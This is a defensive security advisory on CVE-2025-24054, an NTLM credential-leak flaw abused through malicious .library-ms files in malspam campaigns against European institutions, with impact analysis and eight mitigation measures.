CVE-2025-24054 is a critical vulnerability in the NTLM authentication protocol exploited in the wild since March 2025. The attack vector involves maliciously crafted .library-ms files—Windows shell library files—that when right-clicked or browsed to by a user, trigger leakage of NTLM hashes or plaintext user passwords. This minimal user interaction requirement significantly lowers the barrier for exploitation. The vulnerability is a variant of CVE-2024-43451, which was previously patched, but many environments remain unpatched or have incomplete mitigations. Attackers distribute payloads primarily through malspam campaigns containing Dropbox links, targeting government and private sector institutions, especially in Poland and Romania. Once credentials are obtained, attackers can perform lateral movement within networks, escalate privileges, and achieve full system compromise. The exploitation leverages weaknesses in how Windows processes .library-ms files and NTLM authentication, allowing credential theft without requiring elevated privileges or complex user actions. The campaign is attributed to the adversary group UAC-0194. The threat is significant for European organizations that still rely on NTLM authentication and lack advanced endpoint detection and response (EDR) capabilities. Mitigation strategies include restricting processing of .library-ms files, improving email filtering to block malicious links, enforcing multi-factor authentication (MFA) to reduce credential misuse, deploying EDR solutions to detect and respond to exploitation attempts, and disabling NTLM authentication where possible to eliminate the attack surface.

For European organizations, the impact of CVE-2025-24054 is substantial. Successful exploitation leads to leakage of NTLM hashes or plaintext credentials, which can be used for lateral movement, privilege escalation, and full compromise of affected systems. This threatens confidentiality, integrity, and availability of critical systems and sensitive data. Government institutions and private enterprises in Poland and Romania are primary targets, but the campaign's reach extends to Ukraine, Germany, France, Italy, the UK, and Spain, where similar IT environments and reliance on NTLM exist. The use of malspam with Dropbox links increases the likelihood of initial compromise, especially in organizations with insufficient email filtering and endpoint protections. The vulnerability's exploitation can disrupt operations, lead to data breaches, and facilitate espionage or sabotage, particularly in strategic sectors. Organizations without robust mitigations face increased risk of persistent attacker presence and significant operational and reputational damage.

To mitigate CVE-2025-24054, European organizations should implement the following specific measures: 1) Restrict or disable processing of .library-ms files through Group Policy or endpoint controls to prevent automatic handling of malicious files. 2) Enhance email security by deploying advanced filtering solutions that detect and block malspam campaigns, especially those containing links to cloud storage services like Dropbox. 3) Enforce multi-factor authentication (MFA) across all user accounts to reduce the risk of credential misuse even if hashes or passwords are leaked. 4) Deploy and maintain Endpoint Detection and Response (EDR) solutions capable of detecting suspicious file interactions and lateral movement behaviors associated with NTLM exploitation. 5) Where feasible, disable NTLM authentication in favor of more secure protocols such as Kerberos, or implement NTLM blocking policies to limit its use. 6) Conduct user awareness training focused on the risks of interacting with unknown files and links, emphasizing the minimal user interaction required for exploitation. 7) Regularly audit and patch systems to ensure any related vulnerabilities are addressed promptly. 8) Monitor network traffic for unusual authentication attempts or lateral movement indicative of exploitation attempts.